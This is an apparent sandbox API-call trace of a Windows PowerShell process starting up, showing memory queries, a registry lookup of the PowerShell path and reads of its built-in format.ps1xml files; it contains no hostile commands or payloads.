	[0312.929] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.936] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.937] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.937] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.937] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.937] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.938] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.938] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.938] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.939] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.579] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.579] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.579] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.579] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.581] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.583] VirtualQuery (in: lpAddress=0x1cbea0, lpBuffer=0x1ccd60, dwLength=0x30 | out: lpBuffer=0x1ccd60*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.583] VirtualQuery (in: lpAddress=0x1cbea0, lpBuffer=0x1ccd60, dwLength=0x30 | out: lpBuffer=0x1ccd60*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.583] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.584] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.420] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.421] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.422] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.433] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0314.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.433] CoTaskMemFree (pv=0x2a1430) 
	[0314.439] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.445] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.445] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.445] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.445] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.446] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.446] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.447] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.448] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0314.449] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd348 | out: phkResult=0x1cd348*=0x330) returned 0x0
	[0314.449] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1cd35c, lpData=0x0, lpcbData=0x1cd358*=0x0 | out: lpType=0x1cd35c*=0x1, lpData=0x0, lpcbData=0x1cd358*=0x74) returned 0x0
	[0314.449] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1cd2cc, lpData=0x0, lpcbData=0x1cd2c8*=0x0 | out: lpType=0x1cd2cc*=0x1, lpData=0x0, lpcbData=0x1cd2c8*=0x74) returned 0x0
	[0314.449] CoTaskMemAlloc (cb=0x78) returned 0x2a5220
	[0314.449] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1cd29c, lpData=0x2a5220, lpcbData=0x1cd298*=0x74 | out: lpType=0x1cd29c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd298*=0x74) returned 0x0
	[0314.449] CoTaskMemFree (pv=0x2a5220) 
	[0314.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0314.449] SetErrorMode (uMode=0x1) returned 0x1
	[0314.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0314.449] SetErrorMode (uMode=0x1) returned 0x1
	[0314.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0314.451] SetErrorMode (uMode=0x1) returned 0x1
	[0314.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0314.451] SetErrorMode (uMode=0x1) returned 0x1
	[0314.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0314.451] SetErrorMode (uMode=0x1) returned 0x1
	[0314.452] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0314.452] SetErrorMode (uMode=0x1) returned 0x1
	[0314.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0314.452] SetErrorMode (uMode=0x1) returned 0x1
	[0314.452] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0315.140] SetErrorMode (uMode=0x1) returned 0x1
	[0315.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.140] SetErrorMode (uMode=0x1) returned 0x1
	[0315.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0315.140] SetErrorMode (uMode=0x1) returned 0x1
	[0315.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0315.141] SetErrorMode (uMode=0x1) returned 0x1
	[0315.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0315.141] SetErrorMode (uMode=0x1) returned 0x1
	[0315.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0315.141] SetErrorMode (uMode=0x1) returned 0x1
	[0315.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0315.141] SetErrorMode (uMode=0x1) returned 0x1
	[0315.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0315.141] SetErrorMode (uMode=0x1) returned 0x1
	[0315.141] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0315.142] SetErrorMode (uMode=0x1) returned 0x1
	[0315.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0315.142] SetErrorMode (uMode=0x1) returned 0x1
	[0315.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0315.142] SetErrorMode (uMode=0x1) returned 0x1
	[0315.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0315.142] SetErrorMode (uMode=0x1) returned 0x1
	[0315.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd220 | out: lpFileInformation=0x1cd220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0315.142] SetErrorMode (uMode=0x1) returned 0x1
	[0315.143] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0315.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.143] CoTaskMemFree (pv=0x2a1430) 
	[0315.146] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0315.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.146] CoTaskMemFree (pv=0x2a1430) 
	[0315.147] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0315.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.147] CoTaskMemFree (pv=0x2a1430) 
	[0315.147] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0315.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.148] CoTaskMemFree (pv=0x2a1430) 
	[0315.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.148] SetErrorMode (uMode=0x1) returned 0x1
	[0315.148] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0315.148] GetFileType (hFile=0x308) returned 0x1
	[0315.148] SetErrorMode (uMode=0x1) returned 0x1
	[0315.149] GetFileType (hFile=0x308) returned 0x1
	[0315.149] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.150] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.150] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.151] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.151] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.151] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.151] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x9e2, lpOverlapped=0x0) returned 1
	[0315.152] ReadFile (in: hFile=0x308, lpBuffer=0x32cc802, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cc802*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.152] ReadFile (in: hFile=0x308, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.152] CloseHandle (hObject=0x308) returned 1
	[0315.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.152] SetErrorMode (uMode=0x1) returned 0x1
